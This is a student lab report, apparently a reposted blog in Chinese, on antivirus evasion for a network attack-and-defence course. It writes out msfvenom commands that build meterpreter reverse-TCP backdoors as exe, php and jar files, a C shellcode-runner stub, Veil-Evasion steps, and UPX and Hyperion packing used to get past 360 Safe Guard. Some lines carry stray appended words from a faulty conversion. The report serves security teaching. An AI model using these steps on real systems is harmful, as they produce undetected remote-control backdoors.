2018-2019-2 網絡對抗技術 20165219 Exp3 免殺原理與實踐
2018-2019-2 網絡對抗技術 20165219 Exp3 免殺原理與實踐
實驗任務
1 正確使用msf編碼器,msfvenom生成如jar之類的其餘文件,veil-evasion,本身利用shellcode編程等免殺工具或技巧;(1.5分)php
2 經過組合應用各類技術實現惡意代碼免殺(1分)
(若是成功實現了免殺的,簡單語言描述原理,不要截圖。與殺軟共生的結果驗證要截圖。)java
3 用另外一電腦實測,在殺軟開啓的狀況下,可運行並回連成功,註明電腦的殺軟名稱與版本(1分)shell
基礎問題回答
(1)殺軟是如何檢測出惡意代碼的?編程
分析特徵碼,惡意代碼都含有的一段代碼,簡稱特徵碼,只要包含這段代碼就被認定是惡意代碼;windows
檢測該代碼執行時是否有異常的行爲,好比打開異常端口、關閉防火牆等。數組
(2)免殺是作什麼?
經過一些手段對惡意代碼進行假裝,不被殺毒軟件檢測出。安全
(3)免殺的基本方法有哪些?網絡
改變特徵碼,改變行爲,利用現有playload手工打造一個後門程序。tcp
實驗過程
正確使用msf編碼器,msfvenom生成如jar之類的其餘文件,veil-evasion,加殼工具,本身利用shellcode編程等免殺工具或技巧
使用msf編碼器msfvenom生成後門程序
實驗二中生成的後門程序,在virscan網站中掃描
工具
經過圖片能夠看到,不加處理的惡意代碼能被絕大多數殺毒軟件識別。
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=攻擊機的IP LPORT=端口號 -f exe > xxx.exe
進行10次編碼試試下降檢出率
在virscan網站中掃描
雖然進行屢次編碼,但特徵碼仍存在,所以依舊能被絕大多數殺毒軟件檢測出來。
msfvenom生成php文件
msfvenom -p php/meterpreter/reverse_tcp LHOST=攻擊機的IP LPORT=端口號 x> xxx.php
在virscan網站中掃描
msfvenom生成jar文件
msfvenom -p java/meterpreter/reverse_tcp LHOST=攻擊機的IP LPORT=端口號 x> xxx.jar
在virscan網站中掃描
使用veil-evasion生成後門程序及檢測
安裝veil成功以後,輸入veil,再用use evasion命令
輸入命令use c/meterpreter/rev_tcp.py進入配置界面
設置反彈鏈接IP:set LHOST 此處IP爲Kali IP
設置端口:set LPORT 5219
輸入generate生成文件,而後輸入playload的名字
在目錄 /usr/share/veil-output/compiled裏找到咱們生成的文件,在virscan網站中掃描
利用shellcode編程
msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻擊機ip LPORT=端口號 -f c
生成一段c語言格式的shellcode數組
編輯一個.c文件
unsigned char buf[] =
int main()
{
int (*func)() = (int(*)())buf;
func();
}
i686-w64-mingw32-g++ 20165219.c -o 20165219.exe
編譯後變成可執行文件
進行檢測
windows上用殺軟檢測
加壓縮殼
對上面的shellcode加殼
檢測
使用加密殼Hyperion
將wyb_upxed.exe拷貝到/usr/share/windows-binaries/hyperion/
端輸入命令wine hyperion.exe -v wyb_upxed.exe wyb_upxed_Hyperion.exe
經過組合應用各類技術實現惡意代碼免殺
對半手工製做shellcode加壓縮殼不能達到免殺的目的,加密殼有必定的概率是能夠達到了免殺的目的。
加密殼的免殺和反彈鏈接
用另外一電腦實測,在殺軟開啓的狀況下,可運行並回連成功,註明電腦的殺軟名稱與版本
對方電腦的殺毒軟件爲:360安全衛士 版本11
免殺的截圖
回連成功的結果圖
實驗過程當中遇到的問題
沒有成功安裝veil
解決辦法:拷了別的同窗安裝好veil的虛擬機
離實戰還缺些什麼技術或步驟?
免殺技術單一,跟不上病毒庫的更新,之後應該嘗試多種技術的組合
實踐總結與體會
學習完本次的實驗對免殺原理有了深層次的瞭解,爲之後防範惡意軟件攻擊打下了基礎。
- 1. 20155207 《網絡對抗技術》EXP3 免殺原理與實踐
- 2. 20145215《網絡對抗》Exp3 免殺原理與實踐
- 3. 20145307陳俊達《網絡對抗》Exp3 免殺原理與實踐
- 4. 20154307《網絡對抗》Exp3 免殺原理與實踐
- 5. 20155333 《網絡對抗》Exp3 免殺原理與實踐
- 6. 20155218《網絡對抗》Exp3 免殺原理與實踐
- 7. 2017-2018-2 20155303 『網絡對抗技術』Exp3:免殺原理與實踐
- 8. 2018-2019-2 《網絡對抗技術》Exp3 免殺原理與實踐 20165211
- 9. 2017-2018-4 20155203《網絡對抗技術》Exp3 免殺原理與實踐
- 10. 2018-2019-2 20165234 《網絡對抗技術》 Exp3 免殺原理與實踐
- 更多相關文章...
- • 網站主機 技術 - 網站主機教程
- • XML 相關技術 - XML 教程
- • ☆技術問答集錦(13)Java Instrument原理
- • Java Agent入門實戰(三)-JVM Attach原理與使用
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. 20155207 《網絡對抗技術》EXP3 免殺原理與實踐
- 2. 20145215《網絡對抗》Exp3 免殺原理與實踐
- 3. 20145307陳俊達《網絡對抗》Exp3 免殺原理與實踐
- 4. 20154307《網絡對抗》Exp3 免殺原理與實踐
- 5. 20155333 《網絡對抗》Exp3 免殺原理與實踐
- 6. 20155218《網絡對抗》Exp3 免殺原理與實踐
- 7. 2017-2018-2 20155303 『網絡對抗技術』Exp3:免殺原理與實踐
- 8. 2018-2019-2 《網絡對抗技術》Exp3 免殺原理與實踐 20165211
- 9. 2017-2018-4 20155203《網絡對抗技術》Exp3 免殺原理與實踐
- 10. 2018-2019-2 20165234 《網絡對抗技術》 Exp3 免殺原理與實踐